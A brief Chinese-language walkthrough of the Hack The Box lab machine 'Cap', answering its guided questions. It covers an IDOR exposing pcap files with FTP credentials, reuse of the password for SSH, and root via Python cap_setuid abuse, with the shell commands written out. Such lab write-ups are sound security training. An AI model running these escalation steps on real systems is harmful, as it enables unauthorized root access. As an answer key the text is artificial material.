Cap#
ip:10.10.10.245
Cap 是一台簡單難度的運行 HTTP 伺服器的 Linux 機器,該伺服器執行包括執行網路捕獲在內的管理功能。不當的控制導致不安全的直接物件引用(IDOR),從而獲得對另一用戶捕獲的訪問權限。該捕獲包含明文憑證,可用於獲得立足點。隨後利用 Linux 功能提升至 root 權限。
task1
有多少 TCP 端口是開放的?
3
task2
運行 “Security Snapshot” 後,瀏覽器將重定向到格式為/[something]/[id]
的路徑,其中[id]
代表掃描的 ID 號。[something]
是什麼?
task3 你能查看其他用戶的掃描結果嗎?
通過更改 data 後面的數字 id,可以查看其他用戶的掃描結果
task4 PCAP 文件包含敏感數據的 ID 是什麼?
id 指的是 data 的編號,在 0 號 pcap 文件中有 ftp 登錄的帳號信息
task5 在 pcap 文件中,敏感數據會出現在哪個應用層協議裡?
ftp
task6 我們拿到了 Nathan 的 FTP 密碼。這個密碼還能用在其他什麼服務上?
ssh
task 7 提交位於 nathan 用戶主目錄中的 flag
ssh nathan@10.10.10.245
登錄後即可看到 flag
task8 提交 root 目錄下的 flag
查看 suid 位設置
find / -perm -u=s -type f 2>/dev/null
提權腳本
https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS
上傳至靶機 10.10.10.245
python
參考:https://gtfobins.github.io/gtfobins/python/
cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8
import os
os.setuid(0)
os.system("/bin/bash")